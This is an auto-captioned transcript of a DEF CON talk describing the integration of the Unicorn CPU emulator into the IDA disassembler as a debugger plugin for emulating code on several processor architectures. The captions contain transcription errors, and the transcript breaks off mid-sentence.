00:00:00.767,00:00:05.506 >> Hi DefCon. So, you’re at the last talk of the evening. Please 00:00:05.506,00:00:10.344 welcome Chris Eagle. [Audience Applause] >>All right, thanks 00:00:10.344,00:00:16.483 very much. Can everybody hear me? [Inaudible audience reply] 00:00:16.483,00:00:21.488 Can’t hear you. Can you hear me? Good. [Inaudible] Um, I’m Chris 00:00:23.590,00:00:26.260 Eagle, thanks uh, thanks for coming. Got the Mr Robot 00:00:26.260,00:00:29.463 [Inaudible] on next door. Maybe you’re all just here to stare at 00:00:29.463,00:00:33.834 the sexy machines back here, I don’t know. I’m about tired of 00:00:33.834,00:00:39.039 them [Laughs] [Audience laughs] Oh, where did my sheep go? 00:00:39.039,00:00:45.078 [Grunts] She wandered off. Um, okay, um [Chuckles] Wrong 00:00:45.078,00:00:50.083 angle... [Chuckles] Not her best side.... Okay, I’m here to talk 00:00:52.252,00:00:55.989 about uh, a project that I’ve been working on uh, for a lack 00:00:55.989,00:01:00.794 of a better name, called ‘School De-bug’. And, uh, it’s about uh, 00:01:00.794,00:01:05.799 emulating various processors using uh, the Unicorn framework 00:01:05.799,00:01:09.102 for emulation that was released at BlackHat last year, and uh, 00:01:09.102,00:01:13.607 because it’s kind of what I do, it’s all baked into IDA, and 00:01:13.607,00:01:16.910 we’ll uh, we’ll see if it’s interesting and go through a 00:01:16.910,00:01:20.914 couple of example and watch things crash, uh, and hopefully 00:01:20.914,00:01:24.451 have some fun. Uh, got to say this – everything I say today is 00:01:24.451,00:01:26.954 my uh my own opinion, not uh not that of my employer and 00:01:26.954,00:01:32.225 certainly not that of DARPA. Uh, they don’t let me talk on their 00:01:32.225,00:01:35.429 behalf. Uh, little bit about me if you don’t know these folks 00:01:35.429,00:01:37.564 down here in the front row are filling seats to make the room 00:01:37.564,00:01:41.335 look full. I’m a senior lecturer of computer science at uh, out 00:01:41.335,00:01:43.303 at a place called The Naval Post Graduate School in Monterey, 00:01:43.303,00:01:48.308 California. Doing security related stuff, uh, for a long 00:01:48.308,00:01:52.045 time now. Do a lot of reverse engineering of various sorts. I 00:01:52.045,00:01:54.348 play a lot of capture the flag; I’ll be racing back over there 00:01:54.348,00:01:59.987 right after this talk is over. And, uh, a performer of really 00:01:59.987,00:02:04.491 stupid IDA tricks, proofing that just it can be done, doesn’t 00:02:04.491,00:02:07.627 mean it should be done, but that’s worth your watch I guess. 00:02:07.627,00:02:12.633 Uh, so this is really about CPU emulators, okay and uh, they’re 00:02:15.435,00:02:22.109 useful in a lot of cases where you may not have a hardware to 00:02:22.109,00:02:24.711 run a uh, particular set of code on; whether it’s a 00:02:24.711,00:02:28.015 well-structured binary, or just a small snippet of say something 00:02:28.015,00:02:31.084 like say Shell Code, and you don’t happen to have an ARMS 00:02:31.084,00:02:34.221 devices or a MIPS device or SPARK device sitting around and 00:02:34.221,00:02:36.490 you want to know how this thing behaves. So, you’re either going 00:02:36.490,00:02:41.161 to become the world's best human mips engine and you can 00:02:41.161,00:02:44.131 interpret this stuff in your head and process it and uh, 00:02:44.131,00:02:48.568 figure out what’s going on or you might want some help. And 00:02:48.568,00:02:51.671 that’s uh, what I was looking for when I started thinking 00:02:51.671,00:02:56.943 about baking emulators into things like IDA, because in my 00:02:56.943,00:03:00.547 particular use case, IDA is virtually my desktop - I’m in it 00:03:00.547,00:03:06.019 all the time, and I often have a desire to step out and execute 00:03:06.019,00:03:08.221 something because perhaps my comprehension of the 00:03:08.221,00:03:10.991 instructions set is not sufficient enough for me to 00:03:10.991,00:03:13.960 understand what I’m reading, or I just want to verify my 00:03:13.960,00:03:17.998 suspicions about the behavior of a section of code, like to run 00:03:17.998,00:03:21.068 through it – perhaps not en entire executable, maybe I don’t 00:03:21.068,00:03:25.639 want uh, to have to load up ELF and deal with you know the 00:03:25.639,00:03:29.443 colonel loader, and operating system, etcetera. And uh, 00:03:29.443,00:03:33.313 libraries, it’s just a full blown execution environment of 00:03:33.313,00:03:37.884 our just to run through 5 to ten lines of code. Okay, so – I 00:03:37.884,00:03:39.853 thought about this and decided that if you know I could just 00:03:39.853,00:03:43.423 run these line of codes every time I wanted, in some very 00:03:43.423,00:03:46.393 striped down environment, wouldn’t that be nice? We’ll 00:03:46.393,00:03:49.529 talk about how I got to that – how I got there. from, uh, from 00:03:49.529,00:03:52.065 here. You’ll might also want to run some code on obsolete 00:03:52.065,00:03:55.735 platforms, because you don’t have real hardware to do it on. 00:03:55.735,00:03:58.004 There's plenty of software emulators out there these days 00:03:58.004,00:04:02.542 that do these kinds of things. But, uh, another use case for 00:04:02.542,00:04:08.381 uh, emulation and uh, there’s another one I missed but I’m not 00:04:08.381,00:04:10.951 going to go back. Uh, so emulators run the gamit from the 00:04:10.951,00:04:14.287 the, simplest emulators that there are – unicorn is in fact a 00:04:14.287,00:04:18.525 very simple emulator. In fact, its not itself an emulator, its 00:04:18.525,00:04:22.929 not stand alone thing, it is an API that lets you point at 00:04:22.929,00:04:25.832 instructions and execute instructions one or more at a 00:04:25.832,00:04:30.203 time. Okay, receiving some signals along the way – you can, 00:04:30.203,00:04:33.006 you can hook into it and get call-backs, and so on. And I’m 00:04:33.006,00:04:35.308 really not going to talk about the inner workings of Unicorn, 00:04:35.308,00:04:39.112 but I would encourage you to go out and try to find some of the 00:04:39.112,00:04:42.449 slide decks that they posted following BlackHat last year and 00:04:42.449,00:04:44.785 there’s some other presentations they’ve given at a variety of 00:04:44.785,00:04:49.489 conferences, uh, and uh dig into the projects if uh you think 00:04:49.489,00:04:53.927 you, you have a use for baking an emulator into anything. It is 00:04:53.927,00:04:57.097 sort of to execution of instructions that’s what 00:04:57.097,00:05:02.636 capstone was to disassembly of instruction sets. So a fairly 00:05:02.636,00:05:06.540 general-purpose framework across many architectures that lets you 00:05:06.540,00:05:10.110 uh script up things very quickly, uh and in this case uh 00:05:10.110,00:05:14.014 we’re going to execute things uh, in just a few lines of code. 00:05:14.014,00:05:17.984 Uh, that’s the basics of unicorns and all [Inaudible] get 00:05:17.984,00:05:20.387 into But, there is a few fairly sophisticated emulators out 00:05:20.387,00:05:23.356 there I will refer to those later on, but Unicorn is 00:05:23.356,00:05:28.495 literally pointing at an instruction and update the 00:05:28.495,00:05:31.831 internal state of Unicorn and that is it. And that instruction 00:05:31.831,00:05:35.035 manipulates hardware you’re not going to get anything like that, 00:05:35.035,00:05:39.806 okay so the notion of a full blown emulator on like a QEMU 00:05:39.806,00:05:44.778 isn’t what you’re going to get out of Unicorn. So, the idea 00:05:44.778,00:05:48.915 with this project was to build a lightweight CPU emulator, 00:05:48.915,00:05:53.086 available in a static reverse engineering context, right. I 00:05:53.086,00:05:57.324 didn’t want to have to go full-on dynamic analysis, uh, 00:05:57.324,00:06:00.794 with debuggers and processes and maybe a hardware operating 00:06:00.794,00:06:03.096 system, any of that stuff – I just wanted a very lightweight 00:06:03.096,00:06:06.700 emulator that would let me step through code. We can expand on 00:06:06.700,00:06:09.769 it from there, and I’ll go into uh, a little bit about the 00:06:09.769,00:06:14.241 history and what lead me here, in uh, in a couple slides. The 00:06:14.241,00:06:17.677 idea is – you’re looking at some code – we step out of that 00:06:17.677,00:06:21.715 static context we go execute through some instructions in 00:06:21.715,00:06:24.951 this emulated manor, and then we take the knowledge that we 00:06:24.951,00:06:29.022 gained by observing the execution state, either to 00:06:29.022,00:06:32.025 enhance our understanding of the binary, or maybe incorporate 00:06:32.025,00:06:36.563 some of that information back into our static picture, to 00:06:36.563,00:06:40.300 perhaps improve a disassembly and make some annotations uh, 00:06:40.300,00:06:44.004 what have you. You know you view something as simple as utilising 00:06:44.004,00:06:49.209 a simple loop that you see in some code, to decrypt, decode, 00:06:49.209,00:06:52.579 de-obfuscate, whatever it might be, whether that itself is code, 00:06:52.579,00:06:56.516 self modifying code or whether it's some data uh, some strings, 00:06:56.516,00:06:58.852 anything like that and then bring that data, that 00:06:58.852,00:07:03.957 information back into our static analysis, uh, without having any 00:07:03.957,00:07:10.497 code to execution. Uh, okay – so the end result is what I’m going 00:07:10.497,00:07:13.033 to talk about today, just like the [ia] emulator that I baked 00:07:13.033,00:07:16.703 into IDA, because if it’s not in IDA I’m probably not going to 00:07:16.703,00:07:21.174 use it and that provides my static uh, analysis side - my 00:07:21.174,00:07:24.711 disassembly side and then the emulator, as I’ve mentioned 00:07:24.711,00:07:28.214 previously, is going to be based on this Unicorn framework. I’m 00:07:28.214,00:07:33.019 blowing through these slides; I’ll be done in no time. 00:07:33.019,00:07:34.821 [Mumbling] Uh, I imagine if you’re sitting in this room 00:07:34.821,00:07:39.492 today, you’re probably familiar with IDA? So, uh, if you’re not, 00:07:39.492,00:07:41.828 okay… It’s a commercial disassembler, there’s some other 00:07:41.828,00:07:44.030 disassemblers out there, we’re seeing new ones every day. 00:07:44.030,00:07:47.067 Binary ninjas’ a new one that was just released, and uh, maybe 00:07:47.067,00:07:49.469 we can take this project and integrate it with that someday. 00:07:49.469,00:07:54.474 Uh, but for now, uh, I’m primarily working in IDA. It 00:07:54.474,00:07:57.110 supports a lot of different processor families, uh, and so 00:07:57.110,00:08:00.714 that - to me - made it attractive uh, to marry up with 00:08:00.714,00:08:03.116 Unicorn – which also supports a lot of different processor 00:08:03.116,00:08:06.619 families, not as many processor families as IDA does, but okay, 00:08:06.619,00:08:08.655 more than one, more than two, more than three, I don’t know 00:08:08.655,00:08:12.158 six or so. I’ll list them out here in a minute. Uh, but, it 00:08:12.158,00:08:14.861 meant that IDA could understand all of the code that I would 00:08:14.861,00:08:18.732 ever want to emulate in Unicorn. Okay, because the processors 00:08:18.732,00:08:23.303 that IDA supports are a superset of the processor architectures 00:08:23.303,00:08:30.110 that are supported by Unicorn, okay. It’s got uh, IDA itself 00:08:30.110,00:08:34.180 has integrated debugging support, so actual dynamic 00:08:34.180,00:08:36.516 analysis - let’s fire up the processor attached to it and 00:08:36.516,00:08:41.654 pulling state. Uh, for x86 and armed targets and it can do some 00:08:41.654,00:08:45.692 remote debugging on some other targets. Uh, it also has uh, 00:08:45.692,00:08:50.697 decompiler for 32 and 64 bit X86, so, 32 and 64 bit arm. And 00:08:53.066,00:08:58.438 that’s not entirely relevant to our talk today. Unicorn, as I 00:08:58.438,00:09:03.343 mentioned, was introduced at BlackHat last year, comes again 00:09:03.343,00:09:06.179 out of the same group that did the Capstone the disassembly 00:09:06.179,00:09:08.948 framework and now that have uh, a tool called Keystone that in 00:09:08.948,00:09:11.651 fact they may have talked about it at BlackHat. Anybody at 00:09:11.651,00:09:14.587 BlackHat? Did they do Keystone this year? Yeah. So they talked 00:09:14.587,00:09:16.623 about their new project – Keystone – I hope these guys 00:09:16.623,00:09:19.125 keep coming back. That’s like three years in a row – Capstone, 00:09:19.125,00:09:22.862 Unicorn, Keystone and they’re all pretty useful projects. And 00:09:22.862,00:09:25.465 Keystone is their assembly framework. So now we have a 00:09:25.465,00:09:28.067 disassembly framework, an assembly framework and an 00:09:28.067,00:09:30.870 emulation framework. And you start to roll in these things 00:09:30.870,00:09:33.740 together and you get uh, pretty powerful reverse engineering 00:09:33.740,00:09:38.044 capabilities. The link out there to their site is up there on the 00:09:38.044,00:09:43.383 slide uh, it, as an emulation framework is actually based on 00:09:43.383,00:09:48.188 QEMU, so if you’ve ever used QEMU you know that it also 00:09:48.188,00:09:50.990 supports a large number of architectures. And you might 00:09:50.990,00:09:55.161 say, well why do we have Unicorn if QEMU supports a large number 00:09:55.161,00:09:59.666 of architectures, and in fact Unicorn is based on QEMU. Right, 00:09:59.666,00:10:04.103 isn’t this just the same thing all over again? The answer is 00:10:04.103,00:10:10.009 “not quite”. QEMU has a lot of support uh, all the way down 00:10:10.009,00:10:13.713 into hardware shims that lets you do full blown system 00:10:13.713,00:10:17.684 emulation, we can, we can boot Linux, we can boot Windows in 00:10:17.684,00:10:22.055 the QEMU environments because it has that support for hardware 00:10:22.055,00:10:25.892 interfaces, virtual devices and so on. The Unicorn folks were 00:10:25.892,00:10:29.529 not interested in any of that. All they wanted to do was be 00:10:29.529,00:10:34.467 able to emulate processor instructions. Okay, they don’t 00:10:34.467,00:10:36.603 want the hardware interface; they’re not trying to provide 00:10:36.603,00:10:40.106 you network and video drivers or any of that stuff. They just 00:10:40.106,00:10:45.044 wanted to help you uh, emulate instructions. What does it do? 00:10:45.044,00:10:50.316 Let's see, right we run it in the emulator. What they did, was 00:10:50.316,00:10:54.621 they tore into QEMU, they ripped out all that hardware extraction 00:10:54.621,00:10:59.826 layer and we’re left only with, effectively the processors, 00:10:59.826,00:11:05.431 right, the software CPUs that they then layered on top of 00:11:05.431,00:11:08.234 right, we instantiate a processor give it some state it 00:11:08.234,00:11:13.139 can manipulate and they give you access to that processor’s state 00:11:13.139,00:11:18.144 and nothing more. They expose some of that, up to a couple of 00:11:21.014,00:11:26.920 different types of APIs, and there you have it right. A 00:11:26.920,00:11:29.956 scriptable emulator. Supports the family, the processor 00:11:29.956,00:11:34.527 families you’ve seen here X86 both 32 and 64 bit, same ARMS, 00:11:34.527,00:11:38.831 SPARK, MIPS and Motorola 68 000. That’s not all of the processor 00:11:38.831,00:11:44.437 families that are supported by QEMU, but it’s a start. It does 00:11:44.437,00:11:48.708 take a fair amount of work to provide the interface to a given 00:11:48.708,00:11:52.178 processor architecture, uh but I don’t think it would be a 00:11:52.178,00:11:55.381 stretch to add in some of the other processor families that 00:11:55.381,00:11:58.818 are supported by QEMU, if you wanted to enhance the 00:11:58.818,00:12:02.689 capabilities of Unicorn. Okay, a number of projects, this is just 00:12:02.689,00:12:06.926 one of them, have come along which make use of Unicorn – some 00:12:06.926,00:12:12.165 of them are uh, pretty amazing, and uh, baked into a lot of very 00:12:12.165,00:12:15.301 interesting analysis frameworks. I posted a link at the bottom, 00:12:15.301,00:12:18.705 because you may be more interested in those uh, than 00:12:18.705,00:12:22.075 Unicorn itself because they provide a somewhat more finished 00:12:22.075,00:12:24.644 products. Right, these are things that you’d make use of 00:12:24.644,00:12:28.281 right out of the box, right – if you did not intend to bake you 00:12:28.281,00:12:31.818 know – if you didn’t have a need to script an emulator of your 00:12:31.818,00:12:38.691 own. So, you can go find those out there, play around so on, 00:12:38.691,00:12:42.128 okay. So, I picked IDA and I picked Unicorn – there are some 00:12:42.128,00:12:44.664 other emulators as I’ve mentioned, I talked about QEMU 00:12:44.664,00:12:47.400 already. I talked about, I haven’t talked about Box – Box 00:12:47.400,00:12:52.071 is another one, okay. It is a pure x86 emulator. These are 00:12:52.071,00:12:55.975 blups off of each of their project pages. Box is a highly 00:12:55.975,00:13:00.813 portable open source 32 bit uh, x86 emulator. While QEMU is more 00:13:00.813,00:13:04.584 general, a generic more processors open source machine, 00:13:04.584,00:13:08.254 emulator and virtualizer. It’s a little bit more sophisticated 00:13:08.254,00:13:14.560 than Box, but it's also, there’s a lot more to it than Box. So, 00:13:14.560,00:13:20.066 could have gone with either of these I suppose, but they really 00:13:20.066,00:13:25.104 weren’t geared to script around, Okay, and just, just access just 00:13:25.104,00:13:29.208 the processor bits. So this is sort of where I’ve been with 00:13:29.208,00:13:33.446 this project, okay. It’s uh, it’s been kind of a long road. 00:13:33.446,00:13:36.783 Unicorn came along and filled a need that I had and actually 00:13:36.783,00:13:40.620 fulfilled a, a vision that I had back in 2003, when I built a 00:13:40.620,00:13:44.323 tool called IDA x86 emu. Okay, where I wanted to do exactly 00:13:44.323,00:13:47.360 what I’d described. I wanted to sit in IDA and I just wanted to 00:13:47.360,00:13:51.831 emulate things. Okay. And use that to either transform my, my 00:13:51.831,00:13:54.634 static analysis picture or enhance my understanding of the 00:13:54.634,00:13:58.604 behaviour of something. Okay. So, I did that and at the time 00:13:58.604,00:14:01.374 that I did that I looked at those emulators, primarily Box 00:14:01.374,00:14:05.545 and QEMU back then, and though “Can I rip into this, strip out 00:14:05.545,00:14:08.848 the bits I don’t need and take just the emulator?” and I looked 00:14:08.848,00:14:12.452 at it and I’m lazy and I said “Hell no” because they’re way 00:14:12.452,00:14:16.556 too big. Right, so 13 years later, 12 years later somebody 00:14:16.556,00:14:21.094 did it for me. Okay, and so then I revisited this project and 00:14:21.094,00:14:24.297 retools and that’s again why I’m here talking today. So of you 00:14:24.297,00:14:27.900 did all the heavy lifting, by stripping out all the, all the 00:14:27.900,00:14:32.805 unnecessary stuff out of QEMU and dropping it in my lap. Along 00:14:32.805,00:14:38.311 the way, the Hexrays folks, did an integration between Hexrays 00:14:38.311,00:14:40.346 and Box. They did it in a slightly different way, and I’ll 00:14:40.346,00:14:43.116 do two quick demos later on, on what these things look like and 00:14:43.116,00:14:46.185 the different approaches you might take, as you think about 00:14:46.185,00:14:51.324 doing emulation combination with a static analysis. So they 00:14:51.324,00:14:55.862 released a Box debugger module, that IDA could communicate with. 00:14:55.862,00:14:58.898 Right. If you’re familiar with IDA, you’ll understand what the 00:14:58.898,00:15:03.236 debugging uh, views look like, uh, in contrast to the, the pure 00:15:03.236,00:15:06.539 static analysis view, and we’ll uh see that here in a few 00:15:06.539,00:15:13.379 minutes. Uh, did a similar thing for uh, the MSP430 processor, uh 00:15:13.379,00:15:17.784 which uh, was the uh, processor that got used for the micro 00:15:17.784,00:15:20.019 corruption challenges. If any folks have seen that, they’re a 00:15:20.019,00:15:24.490 lot of fun. Uh, and they were, that was a pure MSP430 00:15:24.490,00:15:27.493 implementation and I didn’t want to deal with their clunky use 00:15:27.493,00:15:32.198 interface through uh, through a browser, uh so did this emulator 00:15:32.198,00:15:36.736 uh, it was in a style very similar to IDA X86 emu. And the 00:15:36.736,00:15:41.808 along came Unicorn, and it took me a while, but I finally 00:15:41.808,00:15:48.347 decided to integrate it into IDA to see if I liked it better or 00:15:48.347,00:15:52.218 provided- proved more useful, uh, than some of these other 00:15:52.218,00:15:57.523 combinations of tools. [Clears Throat] As I mentioned, I looked 00:15:57.523,00:16:00.393 at QEMU and Box briefly, but that was going to be a lot of 00:16:00.393,00:16:03.729 work. Uh, I didn’t have the time to uh, do it all and then again 00:16:03.729,00:16:07.166 somebody else came along and did it, uh and their approach 00:16:07.166,00:16:10.837 because we finally got QEMU involved in this whole thing, uh 00:16:10.837,00:16:13.306 it gives us a lot more processors uh, than uh, uh, my 00:16:13.306,00:16:17.343 particular approach, which was specifically an M86 emulator and 00:16:17.343,00:16:20.279 so I got that one narrow architecture and I’ve never had 00:16:20.279,00:16:23.783 another architecture and I’ve never wanted to do another 00:16:23.783,00:16:26.786 architecture, because doing an architecture from scratch uh, 00:16:26.786,00:16:31.290 was just more work than I wanted to get involved with. So, this 00:16:31.290,00:16:37.997 was a nice marriage for me. [Clears Throat] Now, to the 00:16:37.997,00:16:41.901 implementation. In implementing this, I had to make a couple of 00:16:41.901,00:16:45.204 choices. Okay, again uh hopefully people are somewhat 00:16:45.204,00:16:50.009 familiar with IDA and what it looks like, okay. With IDA you 00:16:50.009,00:16:53.446 get your standard disassembly view okay, and then there’s this 00:16:53.446,00:16:57.750 debugging view. Okay, but you have to do a little bit of work 00:16:57.750,00:17:00.753 to integrate what you’ve learned from the debugger back into the 00:17:00.753,00:17:04.757 disassembly view and often times it involves overwriting a lot of 00:17:04.757,00:17:08.394 information in your disassembly view. Okay, so you might going 00:17:08.394,00:17:11.530 into the debugger and learn something but it’s it’s fairly 00:17:11.530,00:17:13.966 transient in nature because you’re starting a process and 00:17:13.966,00:17:17.470 eventually that process is going to terminate, and the 00:17:17.470,00:17:20.206 information that you learn, uh vanishes with that process. 00:17:20.206,00:17:23.676 Okay, there are ways to migrate some of that information back 00:17:23.676,00:17:27.413 into IDA; overwriting the initia- the original data in IDA 00:17:27.413,00:17:32.485 uh, but you’d have to automate some of that and uh, it’s it’s 00:17:32.485,00:17:36.322 not necessarily a very clean approach. Okay, so the 00:17:36.322,00:17:39.792 alternative approach is you don’t jump out to a debugger, 00:17:39.792,00:17:43.429 and you find some way to incorporate emulation right 00:17:43.429,00:17:47.900 there alongside your static analysis view. Okay, in order to 00:17:47.900,00:17:50.536 do that your emulation has to be able to maintain state, so 00:17:50.536,00:17:54.507 you’re either maintaining state entirely separately from what 00:17:54.507,00:17:57.410 you’re looking at in IDA, right? In IDA you get to see an entire 00:17:57.410,00:18:00.479 disassembly right, through the various portions of a program; 00:18:00.479,00:18:03.883 your code, your data, etcetera. What you don’t have are things 00:18:03.883,00:18:07.787 like a stack or a heap, right, any of your uh, virtually 00:18:07.787,00:18:13.326 allocated memory. Uh, and, but you need that in the emulation. 00:18:13.326,00:18:16.462 So, you either start modifying your database and adding all of 00:18:16.462,00:18:20.733 that, those bits and pieces in there, right so you expose them 00:18:20.733,00:18:24.470 and make them available to view and navigate through. Or, all 00:18:24.470,00:18:27.340 that information remains buried in the emulation and you have to 00:18:27.340,00:18:31.344 come up with some way to, to propagate just what you want up 00:18:31.344,00:18:34.680 into the static analysis view, when you’re ready to consume it 00:18:34.680,00:18:36.616 right, when you’ve decided that you’ve learned want you wanted 00:18:36.616,00:18:39.652 to learn and you’re ready to annotate that static analysis. 00:18:41.887,00:18:45.858 When I did X86 emu, I took the first approach. Okay, and you’re 00:18:45.858,00:18:49.795 literally emulating on top of an existing IDA database, so as you 00:18:49.795,00:18:53.232 do the emulation, you’re database get modified. There are 00:18:53.232,00:18:55.601 some advantages and disadvantages to that approach, 00:18:55.601,00:18:58.337 right. The disadvantages is obviously that is destructive, 00:18:58.337,00:19:01.841 okay, so once you’ve modified something in you know, if you’re 00:19:01.841,00:19:04.844 and IDA user you know there’s no ‘undo’ in IDA. Right, so once 00:19:04.844,00:19:07.480 you’ve modified it, right, there’s no going back, right. 00:19:07.480,00:19:09.949 So, if you want to see what it used to look like, you either 00:19:09.949,00:19:14.420 maintain a separate database, a lot of snapshots uh, and it 00:19:14.420,00:19:17.957 becomes – it becomes a headache. But there – I have found it to 00:19:17.957,00:19:24.230 be useful in many cases. The alternative approach is to take 00:19:24.230,00:19:28.167 debugging sort of approach, and generally speaking in IDA that 00:19:28.167,00:19:31.203 means you’re launching a process and you’re attaching to is in a 00:19:31.203,00:19:33.939 way that a standard debugger would attach to the process; 00:19:33.939,00:19:38.711 controlling the process, viewing the state of the process using 00:19:38.711,00:19:43.082 IDA as a viewer, okay so you see what the running process state 00:19:43.082,00:19:45.718 is, gives you access to all the things you have in a typical 00:19:45.718,00:19:49.922 debugger. And in this case you’re not manipulating your 00:19:49.922,00:19:53.159 static view at all, that IDA database doesn’t get changed at 00:19:53.159,00:19:57.196 all, unless you absolutely want it to. Okay, you’re view is 00:19:57.196,00:20:01.233 strictly into that transient process. Okay, again when it’s 00:20:01.233,00:20:04.670 done, it’s done, okay. Perhaps you learn something, perhaps you 00:20:04.670,00:20:08.040 use it to update your state - the way you use that is entirely 00:20:08.040,00:20:11.877 up to you. This is the approach that the Hexrays folks took when 00:20:11.877,00:20:17.483 they integrated Box into IDA. IDA shells out the Box, they 00:20:17.483,00:20:22.788 create some IPC links between IDA and Box, IDA pushes the 00:20:22.788,00:20:27.426 state into Box, okay, including right the code, the data that 00:20:27.426,00:20:32.498 are being represented in that IDA database, and then tells Box 00:20:32.498,00:20:36.068 to go, right, gives an initial recognition register state and 00:20:36.068,00:20:40.439 then single step, or allows it to run freely, okay, as you see 00:20:40.439,00:20:44.477 fit. Okay, pulls the data back out of Box and shows it to you 00:20:44.477,00:20:47.079 in IDA’s debugger view. But then again, once you’re done, you’re 00:20:47.079,00:20:50.850 done and none of that updates or static analysis state. I did 00:20:50.850,00:20:54.753 mention there are some ways to pull state back into IDA, but 00:20:54.753,00:20:59.158 you know it’s entirely up to you how you’re going to do it. I’ll 00:20:59.158,00:21:01.193 show you some demonstrations, I’ll show you two approaches, 00:21:01.193,00:21:05.831 and uh, you can use that to understand what I do with 00:21:05.831,00:21:12.304 Unicorn. [Clears Throat] In the case of Unicorn, the approach I 00:21:12.304,00:21:17.409 ended up taking was the debugging approach. Because, it 00:21:17.409,00:21:19.612 just felt a little bit cleaner, I didn’t want to get into 00:21:19.612,00:21:23.883 updating databases uh, I wanted to leave things flexible for the 00:21:23.883,00:21:28.220 future, uh, might come along and implemented it differently. But, 00:21:28.220,00:21:31.457 in order to implement it outside of a debugger, right, IDA 00:21:31.457,00:21:37.129 doesn’t provide you any tools uh, to display something like 00:21:37.129,00:21:41.000 registers, for example. Any of that execution state while 00:21:41.000,00:21:43.802 you’re in a static analysis state registers have no value so 00:21:43.802,00:21:48.073 you have to invent that user interface yourself. So, that’s 00:21:48.073,00:21:52.077 one of the hard parts about doing it, uh, outside of the 00:21:52.077,00:21:55.414 debugger state. My wife’s probably – she’s sitting up here 00:21:55.414,00:21:59.518 and she’s not liking the slide – I don’t know, or agreeing with 00:21:59.518,00:22:03.589 it. Right, in any case, uh took on this task trying to integrate 00:22:03.589,00:22:07.693 IDA with uh, Unicorn, uh, a lot of unhappy development time, uh, 00:22:07.693,00:22:13.632 a supportive wife, okay, a lot of time dealing with a mostly 00:22:13.632,00:22:18.771 undocumented IDA interface, Uh, dealing with a particular style 00:22:18.771,00:22:22.208 of plugin, known as a debugger plugin. And again, for those of 00:22:22.208,00:22:25.811 you that know IDA, you know the state of its documentation. Uh, 00:22:25.811,00:22:28.480 so I spent a lot of time reverse engineering IDA to try to learn 00:22:28.480,00:22:31.717 how their debuggers actually work, because there isn’t much 00:22:31.717,00:22:35.521 to go on in there. Uh, at the same time I was trying to 00:22:35.521,00:22:39.091 integrate a piece of software that was really I say beta, 00:22:39.091,00:22:42.127 that’s kind of generous, at the time I was doing this it was 00:22:42.127,00:22:47.733 more like pre Alpha, So, uh, you never know where the problems 00:22:47.733,00:22:52.104 lie – is it Unicorn? Is it IDA? Is it me? Uh, and uh, that’s 00:22:52.104,00:22:58.644 what lead to bullet number one. But in the end I was able to 00:22:58.644,00:23:04.717 subclass IDA’s debugger type, to provide debuggers for all of the 00:23:04.717,00:23:10.923 supported Unicorn processor families, and end up with a 00:23:10.923,00:23:16.128 debugger style interface for any one of these architectures, that 00:23:16.128,00:23:19.565 you could use to emulate code wherever you are. So, if you’re 00:23:19.565,00:23:22.801 using IDA on windows, and you’re running Unicorn, and you open up 00:23:22.801,00:23:26.105 a MIPS binary – you don’t have to go find a MIPS platform 00:23:26.105,00:23:30.442 anywhere, right you can just pop out into the debugger and 00:23:30.442,00:23:33.846 emulate through you’re MIPS code and if you want to, you can 00:23:33.846,00:23:36.115 utilise IDAs features from pulling some of that information 00:23:36.115,00:23:41.120 back. Same is true for Spark, or Arm – what’d I say? 68K? x86, 64 00:23:44.223,00:23:50.262 Bit x86 on the 32 bit platform, or visa versa. Uh, so uh, I got 00:23:50.262,00:23:53.232 exactly what I wanted 12 years ago with a lot more flexibility. 00:23:53.232,00:23:59.138 Okay [c t]. As it’s doing this, you can go anywhere from basic 00:23:59.138,00:24:03.442 “I got 5 lines of code I want to emulate” okay, to “trying to 00:24:03.442,00:24:07.346 emulate through and actual process” right, if the code is 00:24:07.346,00:24:10.282 formatted in a form of an executable … like an ELF or a 00:24:10.282,00:24:16.722 PE, okay. The debugger plugin tries to load that up and map 00:24:16.722,00:24:22.695 that into and address space that is roughly what you get if you 00:24:22.695,00:24:25.097 were to run it on the actual architecture the binary was 00:24:25.097,00:24:28.167 intended for. Okay, there’s a lot of challenge with doing 00:24:28.167,00:24:31.437 that, okay. We don’t get to op- we don’t get to emulate through 00:24:31.437,00:24:33.972 the colonel, right we don’t have a system called interface, 00:24:33.972,00:24:37.710 although we’ll talk about later one of my goals is to add a 00:24:37.710,00:24:40.779 capability of a hooking system calles, so you can sub out some 00:24:40.779,00:24:44.149 of the more common ones perhaps, and provide some fake results 00:24:44.149,00:24:49.755 back up into your emulation. So, the uh, the debugger includes 00:24:49.755,00:24:55.728 very basic loader for PE’s and ELFs, right they load those two 00:24:55.728,00:25:00.599 file formats into Unicorn’s uh, state into, into the Unicorn 00:25:00.599,00:25:03.535 emulation before you start up you’re emulation, give you 00:25:03.535,00:25:09.208 stacks, and so on. Okay, if you don’t have a format that Unicorn 00:25:09.208,00:25:13.245 recognises, okay or the “School Debug” recognises, then all it 00:25:13.245,00:25:16.849 does is takes the entire content of your IDA database and then 00:25:16.849,00:25:21.420 copies it out into Map sections, right, in the Unicorn emulator. 00:25:21.420,00:25:24.123 So, however it’s mapped in IDA, right, that’s what you get out 00:25:24.123,00:25:28.026 in Unicorn. It usually throws in a stack okay, because that’s 00:25:28.026,00:25:30.329 something you’re going to need, that you don’t ever see in IDA, 00:25:30.329,00:25:35.267 okay, but stacks are pretty useful and uh, and awful lot of 00:25:35.267,00:25:40.472 instructions make use of them. Some of the issues, with uh, 00:25:40.472,00:25:44.209 doing all this- If anybody’s used Unicorn, right, you might 00:25:44.209,00:25:49.281 have some familiarity with building that Uh, IDA is a 32 00:25:49.281,00:25:53.285 bit executable, Okay. Even though you may see ‘well there’s 00:25:53.285,00:25:56.522 this 64 bit uh, version of IDA out there. All that means is 00:25:56.522,00:26:01.293 that it can understand Uh 64 bit binaries. Okay, it is still a 32 00:26:01.293,00:26:05.431 bit native executable when you go to run it. That means that if 00:26:05.431,00:26:08.867 you want to integrate with it, you’ve got to build 32bit 00:26:08.867,00:26:12.638 libraries. Okay, so when you build Unicorn, you’ve got to 00:26:12.638,00:26:16.642 build it in the 32 bit library of Unicorn, for the platform 00:26:16.642,00:26:19.511 you’re running IDA on, okay, whether that’s Windows, Linux or 00:26:19.511,00:26:23.749 Mac. Unicorn unfortunately does have very good support for 00:26:23.749,00:26:27.686 building 32bit libraries, they sort of assume that everybody’s 00:26:27.686,00:26:30.823 doing 64bit stuff these days. Why would you want to build 00:26:30.823,00:26:35.227 32bit binary anymore? So we had to fix that up a little bit, and 00:26:35.227,00:26:37.896 they’re getting better at uh, being able to build 32bit 00:26:37.896,00:26:43.302 binaries. Uh, doesn’t also have- also doesn’t have very good 00:26:43.302,00:26:45.637 support available for building on 